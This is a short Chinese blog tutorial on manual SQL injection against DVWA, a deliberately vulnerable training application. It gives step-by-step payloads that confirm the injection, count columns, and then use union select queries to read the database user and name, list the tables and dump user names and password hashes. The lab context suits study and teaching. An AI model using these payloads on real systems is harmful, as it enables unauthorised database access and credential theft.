DVWA、SQL注入(手工)

1、在提交的表单框里输入:
1’ and 1=1# 页面有正常输出
1’ and 1=2# 页面无内容输出
则说明存在SQL注入漏洞;
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2、继续在表单框中输入:
1’ order by 1# 页面有正常反应
在这里插入图片描述
直到输入: 1’ order by n# 页面有新的跳转,如图,则说明该数据库存在n-1列;
在这里插入图片描述
在这里插入图片描述
3、继续输入:

1union select user(),database()#

页面返回的user对应的内容为当前数据库连接的用户;database对应的内容为当前数据库名称;
在这里插入图片描述
4、继续输入:

1union select table_name,table_schema from information_schema.tables where table_schema=’数据库名称’#

可以查询到数据库总有哪些数据表;
在这里插入图片描述
5、继续输入:

1union select user,password from users#

以此来获取user和对应的password;
注:所获得密码为哈希加密后的密码,需要进行解密;
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值